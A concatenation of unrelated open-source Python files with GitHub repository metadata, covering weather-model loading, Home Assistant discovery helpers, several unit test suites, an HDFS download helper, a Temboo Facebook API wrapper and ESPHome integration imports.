"max_line_length": 78,
"avg_line_length": 31.181818181818183,
"alnum_prop": 0.6807580174927114,
"repo_name": "dhermes/gcloud-python",
"id": "d574de7785f71233c9490fc1777da2afd60d5e54",
"size": "1262",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "logging/tests/system/gapic/v2/test_system_logging_service_v2_v2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "95635"
},
{
"name": "Python",
"bytes": "2871895"
},
{
"name": "Shell",
"bytes": "4683"
}
],
"symlink_target": ""
}
|
from datetime import timedelta
from glob import glob
import numpy as np
from .GribModelGrid import GribModelGrid
class HREFv2ModelGrid(GribModelGrid):
"""
Extension of the ModelGrid class for interfacing with the HREFv2 ensemble.
Args:
member (str): Name of the ensemble member
run_date (datetime.datetime object): Date of the initial step of the ensemble run
variable(int or str): name of grib2 variable(str) or grib2 message number(int) being loaded
start_date (datetime.datetime object): First time step extracted.
end_date (datetime.datetime object): Last time step extracted.
path (str): Path to model output files
"""
def __init__(self, member, run_date, variable, start_date,
end_date, path):
self.path = path
self.member = member
filenames = []
self.forecast_hours = np.arange((start_date - run_date).total_seconds() / 3600,
(end_date - run_date).total_seconds() / 3600 + 1, dtype=int)
day_before_date = (run_date - timedelta(days=1)).strftime("%Y%m%d")
member_name = str(self.member.split("_")[0])
if '00' in self.member:
initial_hour = '00'
hours = self.forecast_hours
date = run_date.strftime("%Y%m%d")
elif '12' in self.member:
initial_hour = '12'
hours = self.forecast_hours + 12
date = day_before_date
else:
initial_hour = '00'
hours = self.forecast_hours
date = run_date.strftime("%Y%m%d")
for forecast_hr in hours:
if 'nam' in self.member:
files = glob('{0}/{1}/nam*conusnest*{2}f*{3}*'.format(self.path,
date, initial_hour, forecast_hr))
if not files:
files = glob('{0}/{1}/nam*t{2}z*conusnest*{3}*'.format(self.path,
date, initial_hour, forecast_hr))
else:
files = glob('{0}/{1}/*hiresw*conus{2}*{3}f*{4}*'.format(self.path,
date, member_name, initial_hour, forecast_hr))
if len(files) >= 1:
filenames.append(files[0])
super(HREFv2ModelGrid, self).__init__(filenames, run_date, start_date, end_date, variable, member)
return
|
{
"content_hash": "075566e869a28d6c1c0f4945b2108e1e",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 119,
"avg_line_length": 44.94642857142857,
"alnum_prop": 0.5288041319030592,
"repo_name": "djgagne/hagelslag",
"id": "de6d5ace5ca2341f73213764266159413a02a637",
"size": "2539",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hagelslag/data/HREFv2ModelGrid.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "6617598"
},
{
"name": "Python",
"bytes": "933497"
},
{
"name": "Shell",
"bytes": "5545"
}
],
"symlink_target": ""
}
|
"""Helper methods to help with platform discovery.
There are two different types of discoveries that can be fired/listened for.
- listen/discover is for services. These are targetted at a component.
- listen_platform/discover_platform is for platforms. These are used by
components to allow discovery of their platforms.
"""
import asyncio
from homeassistant import bootstrap, core
from homeassistant.const import (
ATTR_DISCOVERED, ATTR_SERVICE, EVENT_PLATFORM_DISCOVERED)
from homeassistant.util.async import run_callback_threadsafe
EVENT_LOAD_PLATFORM = 'load_platform.{}'
ATTR_PLATFORM = 'platform'
def listen(hass, service, callback):
"""Setup listener for discovery of specific service.
Service can be a string or a list/tuple.
"""
run_callback_threadsafe(
hass.loop, async_listen, hass, service, callback).result()
@core.callback
def async_listen(hass, service, callback):
"""Setup listener for discovery of specific service.
Service can be a string or a list/tuple.
"""
if isinstance(service, str):
service = (service,)
else:
service = tuple(service)
@core.callback
def discovery_event_listener(event):
"""Listen for discovery events."""
if ATTR_SERVICE in event.data and event.data[ATTR_SERVICE] in service:
hass.async_add_job(callback, event.data[ATTR_SERVICE],
event.data.get(ATTR_DISCOVERED))
hass.bus.async_listen(EVENT_PLATFORM_DISCOVERED, discovery_event_listener)
def discover(hass, service, discovered=None, component=None, hass_config=None):
"""Fire discovery event. Can ensure a component is loaded."""
hass.add_job(
async_discover(hass, service, discovered, component, hass_config))
@asyncio.coroutine
def async_discover(hass, service, discovered=None, component=None,
hass_config=None):
"""Fire discovery event. Can ensure a component is loaded."""
if component is not None and component not in hass.config.components:
did_lock = False
setup_lock = hass.data.get('setup_lock')
if setup_lock and setup_lock.locked():
did_lock = True
yield from setup_lock.acquire()
try:
# Could have been loaded while waiting for lock.
if component not in hass.config.components:
yield from bootstrap.async_setup_component(hass, component,
hass_config)
finally:
if did_lock:
setup_lock.release()
data = {
ATTR_SERVICE: service
}
if discovered is not None:
data[ATTR_DISCOVERED] = discovered
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, data)
def listen_platform(hass, component, callback):
"""Register a platform loader listener."""
run_callback_threadsafe(
hass.loop, async_listen_platform, hass, component, callback
).result()
def async_listen_platform(hass, component, callback):
"""Register a platform loader listener.
This method must be run in the event loop.
"""
service = EVENT_LOAD_PLATFORM.format(component)
@core.callback
def discovery_platform_listener(event):
"""Listen for platform discovery events."""
if event.data.get(ATTR_SERVICE) != service:
return
platform = event.data.get(ATTR_PLATFORM)
if not platform:
return
hass.async_run_job(
callback, platform, event.data.get(ATTR_DISCOVERED)
)
hass.bus.async_listen(
EVENT_PLATFORM_DISCOVERED, discovery_platform_listener)
def load_platform(hass, component, platform, discovered=None,
hass_config=None):
"""Load a component and platform dynamically.
Target components will be loaded and an EVENT_PLATFORM_DISCOVERED will be
fired to load the platform. The event will contain:
{ ATTR_SERVICE = LOAD_PLATFORM + '.' + <<component>>
ATTR_PLATFORM = <<platform>>
ATTR_DISCOVERED = <<discovery info>> }
Use `listen_platform` to register a callback for these events.
"""
hass.add_job(
async_load_platform(hass, component, platform, discovered,
hass_config))
@asyncio.coroutine
def async_load_platform(hass, component, platform, discovered=None,
hass_config=None):
"""Load a component and platform dynamically.
Target components will be loaded and an EVENT_PLATFORM_DISCOVERED will be
fired to load the platform. The event will contain:
{ ATTR_SERVICE = LOAD_PLATFORM + '.' + <<component>>
ATTR_PLATFORM = <<platform>>
ATTR_DISCOVERED = <<discovery info>> }
Use `listen_platform` to register a callback for these events.
Warning: Do not yield from this inside a setup method to avoid a dead lock.
Use `hass.loop.async_add_job(async_load_platform(..))` instead.
This method is a coroutine.
"""
did_lock = False
setup_lock = hass.data.get('setup_lock')
if setup_lock and setup_lock.locked():
did_lock = True
yield from setup_lock.acquire()
setup_success = True
try:
# Could have been loaded while waiting for lock.
if component not in hass.config.components:
setup_success = yield from bootstrap.async_setup_component(
hass, component, hass_config)
finally:
if did_lock:
setup_lock.release()
# No need to fire event if we could not setup component
if not setup_success:
return
data = {
ATTR_SERVICE: EVENT_LOAD_PLATFORM.format(component),
ATTR_PLATFORM: platform,
}
if discovered is not None:
data[ATTR_DISCOVERED] = discovered
hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, data)
|
{
"content_hash": "0c1d0e99ec6fe32623e72d5748e56f1c",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 79,
"avg_line_length": 32.30769230769231,
"alnum_prop": 0.6489795918367347,
"repo_name": "robjohnson189/home-assistant",
"id": "de16a0b907dcdbb118fb1dcb95312ce116c3c0a2",
"size": "5880",
"binary": false,
"copies": "10",
"ref": "refs/heads/dev",
"path": "homeassistant/helpers/discovery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1362685"
},
{
"name": "Python",
"bytes": "3499625"
},
{
"name": "Ruby",
"bytes": "379"
},
{
"name": "Shell",
"bytes": "7255"
}
],
"symlink_target": ""
}
|
import StringIO
import mock
import unittest
from tavrida import discovery
from tavrida import exceptions
class LocalDiscoveryTestCase(unittest.TestCase):
def test_register_remote_service(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_service(service_name, exchange_name)
self.assertDictEqual(disc._remote_registry,
{"some_service": "some_exchange"})
def test_register_remote_publisher(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_publisher(service_name, exchange_name)
self.assertDictEqual(disc._remote_publisher_registry,
{"some_service": "some_exchange"})
def test_register_local_publisher(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_local_publisher(service_name, exchange_name)
self.assertDictEqual(disc._local_publisher_registry,
{"some_service": "some_exchange"})
def test_unregister_remote_service(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_service(service_name, exchange_name)
disc.unregister_remote_service(service_name)
self.assertDictEqual(disc._remote_registry, {})
def test_unregister_remote_publisher(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_publisher(service_name, exchange_name)
disc.unregister_remote_publisher(service_name)
self.assertDictEqual(disc._remote_publisher_registry, {})
def test_unregister_local_publisher(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_local_publisher(service_name, exchange_name)
disc.unregister_local_publisher(service_name)
self.assertDictEqual(disc._local_publisher_registry, {})
def test_get_remote_positive(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_service(service_name, exchange_name)
res = disc.get_remote(service_name)
self.assertEqual(res, exchange_name)
def test_get_remote_negative(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
self.assertRaises(exceptions.UnableToDiscover,
disc.get_remote, service_name)
def test_get_remote_publisher_positive(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_publisher(service_name, exchange_name)
res = disc.get_remote_publisher(service_name)
self.assertEqual(res, exchange_name)
def test_get_remote_publisher_negative(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
self.assertRaises(exceptions.UnableToDiscover,
disc.get_remote_publisher, service_name)
def test_get_local_publisher_positive(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_local_publisher(service_name, exchange_name)
res = disc.get_local_publisher(service_name)
self.assertEqual(res, exchange_name)
def test_get_local_publisher_negative(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
self.assertRaises(exceptions.UnableToDiscover,
disc.get_local_publisher, service_name)
def test_get_all_exchanges(self):
disc = discovery.LocalDiscovery()
service_name = "some_service"
exchange_name = "some_exchange"
disc.register_remote_service(service_name, exchange_name)
disc.register_remote_publisher(service_name, exchange_name)
disc.register_local_publisher(service_name, exchange_name)
res = disc.get_all_exchanges()
self.assertListEqual(res["remote"], [exchange_name])
self.assertListEqual(res["remote_publisher"], [exchange_name])
self.assertListEqual(res["local_publisher"], [exchange_name])
VALID_DS_FILE = """
[service1]
exchange=service1_exchange
notifications=service1_notifications
[service2]
exchange=service2_exchange
notifications=service2_notifications
[service3]
exchange=service3_exchange
notifications=service3_notifications
[service4]
exchange=service4_exchange
"""
class FileBasedDiscoveryServiceTestCase(unittest.TestCase):
@mock.patch('__builtin__.open')
def setUp(self, open_mock):
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
self.ds = discovery.FileBasedDiscoveryService(
'ds.ini',
'service1',
subscriptions=['service2', 'service3'])
def test_get_remote_service1(self):
self.assertRaises(exceptions.UnableToDiscover,
self.ds.get_remote,
'service1')
def test_get_remote_service2(self):
self.assertEqual(self.ds.get_remote('service2'),
'service2_exchange')
def test_get_remote_service3(self):
self.assertEqual(self.ds.get_remote('service3'),
'service3_exchange')
def test_get_remote_service4(self):
self.assertEqual(self.ds.get_remote('service4'),
'service4_exchange')
def test_get_local_publisher(self):
self.assertEqual(self.ds.get_local_publisher('service1'),
'service1_notifications')
def test_service_without_local_publisher(self):
with mock.patch('__builtin__.open') as open_mock:
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
ds = discovery.FileBasedDiscoveryService(
'ds.ini',
'service4')
self.assertRaises(exceptions.UnableToDiscover,
ds.get_local_publisher,
'service4')
def test_get_remote_publisher_service2(self):
self.assertEqual(self.ds.get_remote_publisher('service2'),
'service2_notifications')
def test_get_remote_publisher_service3(self):
self.assertEqual(self.ds.get_remote_publisher('service3'),
'service3_notifications')
def test_get_remote_publisher_service4(self):
self.assertRaises(exceptions.UnableToDiscover,
self.ds.get_remote_publisher,
'service4')
def test_get_all_exchanges(self):
a = self.ds.get_all_exchanges()
self.assertEqual(set(a['local_publisher']),
{'service1_notifications'})
self.assertEqual(set(a['remote_publisher']),
{'service2_notifications',
'service3_notifications'})
self.assertEqual(set(a['remote']),
{'service2_exchange',
'service3_exchange',
'service4_exchange'})
class FileBasedDiscoveryServiceNegativeTestCase(unittest.TestCase):
@mock.patch('__builtin__.open')
def test_bad_subscription_name(self, open_mock):
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
self.assertRaises(exceptions.ServiceIsNotRegister,
discovery.FileBasedDiscoveryService,
'ds.ini',
'service1',
['service2', 'serviceX'])
@mock.patch('__builtin__.open')
def test_bad_service_name(self, open_mock):
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
self.assertRaises(exceptions.ServiceIsNotRegister,
discovery.FileBasedDiscoveryService,
'ds.ini',
'serviceX')
@mock.patch('__builtin__.open')
def test_bad_subscription(self, open_mock):
"""Subscribe to service without notifications exchange."""
dsfile_ini = StringIO.StringIO(VALID_DS_FILE)
open_mock.return_value = dsfile_ini
self.assertRaises(exceptions.CantRegisterRemotePublisher,
discovery.FileBasedDiscoveryService,
'ds.ini',
'service1',
subscriptions=['service4'])
|
{
"content_hash": "14e7e6db95cc5b7827a0a0c5ee11b929",
"timestamp": "",
"source": "github",
"line_count": 242,
"max_line_length": 70,
"avg_line_length": 37.12396694214876,
"alnum_prop": 0.6194345503116652,
"repo_name": "sbunatyan/tavrida",
"id": "1934a9a0b71525224cfe6cce05f2f8977cfa9d56",
"size": "8984",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_discovery.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "228935"
}
],
"symlink_target": ""
}
|
import os
import sys
from rdr_service.dao.hpo_dao import HPODao
from rdr_service.model.hpo import HPO
from tests.helpers.unittest_base import BaseTestCase
class TestEnvironment(BaseTestCase):
"""
Test our python environment
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.uses_database = False
def test_python_version(self):
""" Make sure we are using Python 3.7 or higher """
self.assertEqual(sys.version_info[0], 3)
self.assertGreaterEqual(sys.version_info[1], 7)
def test_project_structure(self):
""" Test that the project structure looks correct """
cwd = os.path.curdir
self.assertTrue(os.path.exists(os.path.join(cwd, 'rdr_service')))
self.assertTrue(os.path.exists(os.path.join(cwd, 'rdr_service/tools')))
self.assertTrue(os.path.exists(os.path.join(cwd, 'rdr_service/main.py')))
def test_flask_app(self):
"""
Test that we can import the flask app object and get the version id.
https://realpython.com/python-testing/#how-to-use-unittest-and-flask
"""
from rdr_service.main import app
self.assertTrue(isinstance(app, object))
# Put flask in testing mode
app.testing = True
client = app.test_client()
resp = client.get('/')
self.assertEqual(resp.json['version_id'], 'develop')
def test_basic_db_query(self):
"""
Test that we are connected to the database and can complete a query.
"""
with HPODao().session() as session:
count = session.query(HPO).count()
self.assertGreater(count, 0)
|
{
"content_hash": "5cf48177ab1aa066ed04878cc117e0ee",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 81,
"avg_line_length": 34.42857142857143,
"alnum_prop": 0.6271487848251334,
"repo_name": "all-of-us/raw-data-repository",
"id": "511f7a80f285d80120b4f1d4a0b685c6dd6acc0e",
"size": "1687",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "tests/test_environment.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1866"
},
{
"name": "Mako",
"bytes": "1715"
},
{
"name": "Python",
"bytes": "17040924"
},
{
"name": "R",
"bytes": "2212"
},
{
"name": "Shell",
"bytes": "92213"
}
],
"symlink_target": ""
}
|
dubliners_stories = ['The Sisters',
'An Encounter',
'Araby',
'Eveline',
'After the Race',
'Two Gallants',
'The Boarding House',
'A Little Cloud',
'Counterparts',
'Clay',
'A Painful Case',
'Ivy Day in the Committee Room',
'A Mother',
'Grace',
'The Dead']
links = {}
for im1,story in enumerate(dubliners_stories):
i = im1+1
filename_base = "dubliners%d"%(i)
html_filename = filename_base+".html"
md_filename = filename_base+".md"
contents = "Title: "+story
contents += "\nAuthors: James Joyce"
contents += "\nHeaderStyle: languagekey"
contents += "\nsave_as: "+html_filename
contents += "\n\n"
contents += "{%include_html "+html_filename+"%}"
contents += "\n\n"
links[story] = html_filename
with open(md_filename,'w') as f:
f.write(contents)
print "Finished writing markdown file ",md_filename
# now make the main page
filename_base = "dubliners"
html_filename = filename_base+".html"
md_filename = filename_base+".md"
contents = "Title: Dubliners"
contents += "\nAuthors: James Joyce"
contents += "\nHeaderStyle: book"
contents += "\nsave_as: "+html_filename
contents += "\n\n"
for linkname,link in zip(links.keys(),links.values()):
#contents += "[" + linkname + "](" + link + ")"
contents += '<a class="btn btn-large btn-primary" href="'+link+'">'+linkname+'</a>'
contents += "\n"
contents += "\n\n"
with open(md_filename,'w') as f:
f.write(contents)
print "Finished writing markdown file ",md_filename
|
{
"content_hash": "5c0c965614c544f540d09dfdb8e22f2c",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 87,
"avg_line_length": 26.880597014925375,
"alnum_prop": 0.5308162132148806,
"repo_name": "charlesreid1/wordswordswords",
"id": "3c9cd492fc5115c76403751fd7542808ec23e6ce",
"size": "1801",
"binary": false,
"copies": "1",
"ref": "refs/heads/pelican",
"path": "pelican/content/pages/make_dubliners.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "51931"
},
{
"name": "HTML",
"bytes": "63504291"
},
{
"name": "Python",
"bytes": "65994"
},
{
"name": "Ruby",
"bytes": "207"
},
{
"name": "Shell",
"bytes": "165"
}
],
"symlink_target": ""
}
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ["download_from_hdfs", ]
import os
import uuid
import tempfile
import re
from resource_management.libraries.script.script import Script
from resource_management.libraries.resources.hdfs_resource import HdfsResource
from resource_management.libraries.functions.default import default
from resource_management.core import shell
from resource_management.core.logger import Logger
def download_from_hdfs(source_file, dest_path, user_group, owner, download_type="file", file_mode=0444, force_execute=False,
replace_existing_files=False):
"""
:param source_file: the source file path
:param dest_path: the destination path
:param user_group: Group to own the directory.
:param owner: File owner
:param download_type: file or directory
:param file_mode: File permission
:param force_execute: If true, will execute the HDFS commands immediately, otherwise, will defer to the calling function.
:param replace_existing_files: If true, will replace existing files even if they are the same size
:return: Will return True if successful, otherwise, False.
"""
import params
Logger.info("Called download_from_hdfs source in HDFS: {0} , local destination path: {1}".format(source_file, dest_path))
# The destination directory must already exist
if not os.path.exists(dest_path):
Logger.error("Cannot copy {0} because destination directory {1} does not exist.".format(source_file, dest_path))
return False
filename = os.path.basename(source_file)
dest_file = os.path.join(dest_path, filename)
params.HdfsResource(dest_file,
type=download_type,
action="download_on_execute",
source=source_file,
group=user_group,
owner=owner,
mode=file_mode,
replace_existing_files=replace_existing_files,
)
Logger.info("Will attempt to copy from DFS at {0} to local file system {1}.".format(source_file, dest_file))
# For improved performance, force_execute should be False so that it is delayed and combined with other calls.
if force_execute:
params.HdfsResource(None, action="execute")
return True
|
{
"content_hash": "5f323f7df69c02bec1e28f17bc3583eb",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 124,
"avg_line_length": 39.86666666666667,
"alnum_prop": 0.7244147157190636,
"repo_name": "sekikn/ambari",
"id": "5826fc1e8abbc38492bf031e07d25f6875c9f537",
"size": "3012",
"binary": false,
"copies": "5",
"ref": "refs/heads/trunk",
"path": "ambari-common/src/main/python/resource_management/libraries/functions/download_from_hdfs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "22734"
},
{
"name": "C",
"bytes": "109499"
},
{
"name": "C#",
"bytes": "182799"
},
{
"name": "CSS",
"bytes": "616806"
},
{
"name": "CoffeeScript",
"bytes": "4323"
},
{
"name": "Dockerfile",
"bytes": "8117"
},
{
"name": "HTML",
"bytes": "3725781"
},
{
"name": "Handlebars",
"bytes": "1594385"
},
{
"name": "Java",
"bytes": "26670585"
},
{
"name": "JavaScript",
"bytes": "14647486"
},
{
"name": "Jinja",
"bytes": "147938"
},
{
"name": "Less",
"bytes": "303080"
},
{
"name": "Makefile",
"bytes": "2407"
},
{
"name": "PHP",
"bytes": "149648"
},
{
"name": "PLpgSQL",
"bytes": "298247"
},
{
"name": "PowerShell",
"bytes": "2047735"
},
{
"name": "Python",
"bytes": "7226684"
},
{
"name": "R",
"bytes": "1457"
},
{
"name": "Shell",
"bytes": "350773"
},
{
"name": "TSQL",
"bytes": "42351"
},
{
"name": "Vim Script",
"bytes": "5813"
},
{
"name": "sed",
"bytes": "1133"
}
],
"symlink_target": ""
}
|
import contextlib
from unittest import TestCase
from unittest.mock import patch
from io import StringIO
from onelogin_aws_cli.userquery import user_choice, user_role_prompt
class TestUser_choice(TestCase):
def test_user_choice(self):
mock_stdout = StringIO()
with patch('builtins.input', side_effect=['2']):
with contextlib.redirect_stdout(mock_stdout):
result = user_choice('one', ['hallo', 'world', 'foobar'])
output = mock_stdout.getvalue()
assert result == "world"
assert "Invalid option" not in output
def test_user_choice_bad(self):
mock_stdout = StringIO()
with patch('builtins.input', side_effect=['bar', '2']):
with contextlib.redirect_stdout(mock_stdout):
result = user_choice('one', ['hallo', 'world', 'foo'])
output = mock_stdout.getvalue()
assert result == "world"
assert "Invalid option" in output
def test_user_choice_no_options(self):
with self.assertRaises(Exception):
user_choice('one', [])
def test_user_choice_one_option(self):
result = user_choice('one', ['foo'])
self.assertEqual('foo', result)
def test_user_choice_preselected(self):
result = user_choice('one', ['foo', 'bar'], saved_choice='bar')
self.assertEqual('bar', result)
def test_user_choice_bad_preselected(self):
mock_stdout = StringIO()
with patch('builtins.input', side_effect=['2']):
with contextlib.redirect_stdout(mock_stdout):
result = user_choice('one', ['foo', 'bar'], saved_choice='baz')
output = mock_stdout.getvalue()
assert result == "bar"
assert "Invalid option" not in output
assert "Ignoring invalid saved choice" in output
def test_user_role_prompt(self):
mock_stdout = StringIO()
with patch('builtins.input', side_effect=['2']):
with contextlib.redirect_stdout(mock_stdout):
selected_role = user_role_prompt([
('mock_role1', 'mock_principal_1'),
('mock_role2', 'mock_principal_2'),
('mock_role3', 'mock_principal_3')
])
self.assertEqual(('mock_role2', 'mock_principal_2'), selected_role)
self.assertEqual("""Pick a role:
[1] mock_role1
[2] mock_role2
[3] mock_role3
""", mock_stdout.getvalue())
def test_user_role_prompt_one_option(self):
selected_role = user_role_prompt([
('mock_role1', 'mock_principal_1'),
])
self.assertEqual(('mock_role1', 'mock_principal_1'), selected_role)
|
{
"content_hash": "0892dc57d9af9ddb3154b76b0ac04c23",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 79,
"avg_line_length": 32.97530864197531,
"alnum_prop": 0.593036315986522,
"repo_name": "healthcoda/onelogin-aws-cli",
"id": "4b4d5d1ac0d41554ab473eee0a530e37d35e986f",
"size": "2671",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "onelogin_aws_cli/tests/test_userquery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8755"
}
],
"symlink_target": ""
}
|
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteListen(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteListen Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(DeleteListen, self).__init__(temboo_session, '/Library/Facebook/Actions/Music/Listens/DeleteListen')
def new_input_set(self):
return DeleteListenInputSet()
def _make_result_set(self, result, path):
return DeleteListenResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteListenChoreographyExecution(session, exec_id, path)
class DeleteListenInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteListen
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved from the final step of the OAuth process.)
"""
super(DeleteListenInputSet, self)._set_input('AccessToken', value)
def set_ActionID(self, value):
"""
Set the value of the ActionID input for this Choreo. ((required, string) The id of an action to delete.)
"""
super(DeleteListenInputSet, self)._set_input('ActionID', value)
class DeleteListenResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteListen Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((boolean) The response from Facebook. Returns "true" on success.)
"""
return self._output.get('Response', None)
class DeleteListenChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteListenResultSet(response, path)
|
{
"content_hash": "6c220fa6cc9571c56d2036301398bf06",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 153,
"avg_line_length": 38.80327868852459,
"alnum_prop": 0.7051119560625264,
"repo_name": "lupyuen/RaspberryPiImage",
"id": "3d8890ac8f3e833512f0483025eb64e0e8dcfaae",
"size": "3215",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "home/pi/GrovePi/Software/Python/others/temboo/Library/Facebook/Actions/Music/Listens/DeleteListen.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Arduino",
"bytes": "82308"
},
{
"name": "C",
"bytes": "3197439"
},
{
"name": "C#",
"bytes": "33056"
},
{
"name": "C++",
"bytes": "1020255"
},
{
"name": "CSS",
"bytes": "208338"
},
{
"name": "CoffeeScript",
"bytes": "87200"
},
{
"name": "Eagle",
"bytes": "1632170"
},
{
"name": "Go",
"bytes": "3646"
},
{
"name": "Groff",
"bytes": "286691"
},
{
"name": "HTML",
"bytes": "41527"
},
{
"name": "JavaScript",
"bytes": "403603"
},
{
"name": "Makefile",
"bytes": "33808"
},
{
"name": "Objective-C",
"bytes": "69457"
},
{
"name": "Perl",
"bytes": "96047"
},
{
"name": "Processing",
"bytes": "1304"
},
{
"name": "Python",
"bytes": "13358098"
},
{
"name": "Shell",
"bytes": "68795"
},
{
"name": "TeX",
"bytes": "4317"
}
],
"symlink_target": ""
}
|
import time
import pytest
import asyncio
from paco import wait
from .helpers import run_in_loop
@asyncio.coroutine
def coro(num):
yield from asyncio.sleep(0.1)
return num * 2
def test_wait(limit=0):
done, pending = run_in_loop(wait([coro(1), coro(2), coro(3)], limit=limit))
assert len(done) == 3
assert len(pending) == 0
for future in done:
assert future.result() < 7
def test_wait_sequential():
start = time.time()
test_wait(limit=1)
assert time.time() - start >= 0.3
def test_wait_return_exceptions():
@asyncio.coroutine
def coro(num):
raise ValueError('foo')
done, pending = run_in_loop(wait([coro(1), coro(2), coro(3)],
return_exceptions=True))
assert len(done) == 3
assert len(pending) == 0
for future in done:
assert str(future.result()) == 'foo'
def test_wait_empty():
with pytest.raises(ValueError):
run_in_loop(wait([]))
|
{
"content_hash": "967a731d1aa82b83eeecfe584be8876e",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 79,
"avg_line_length": 21.6,
"alnum_prop": 0.6100823045267489,
"repo_name": "h2non/paco",
"id": "dd71d32d6c81123679f1f9f46e98d6ce7f95f30d",
"size": "996",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/wait_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1421"
},
{
"name": "Python",
"bytes": "130516"
}
],
"symlink_target": ""
}
|
"""Support for esphome devices."""
from __future__ import annotations
from collections.abc import Callable
import functools
import logging
import math
from typing import Any, Generic, NamedTuple, TypeVar, cast, overload
from aioesphomeapi import (
APIClient,
APIConnectionError,
APIIntEnum,
APIVersion,
BadNameAPIError,
DeviceInfo as EsphomeDeviceInfo,
EntityCategory as EsphomeEntityCategory,
EntityInfo,
EntityState,
HomeassistantServiceCall,
InvalidEncryptionKeyAPIError,
ReconnectLogic,
RequiresEncryptionAPIError,
UserService,
UserServiceArgType,
)
import voluptuous as vol
from homeassistant import const
from homeassistant.components import zeroconf
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_DEVICE_ID,
CONF_HOST,
CONF_MODE,
CONF_PASSWORD,
CONF_PORT,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import Event, HomeAssistant, ServiceCall, State, callback
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
import homeassistant.helpers.device_registry as dr
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import DeviceInfo, Entity, EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
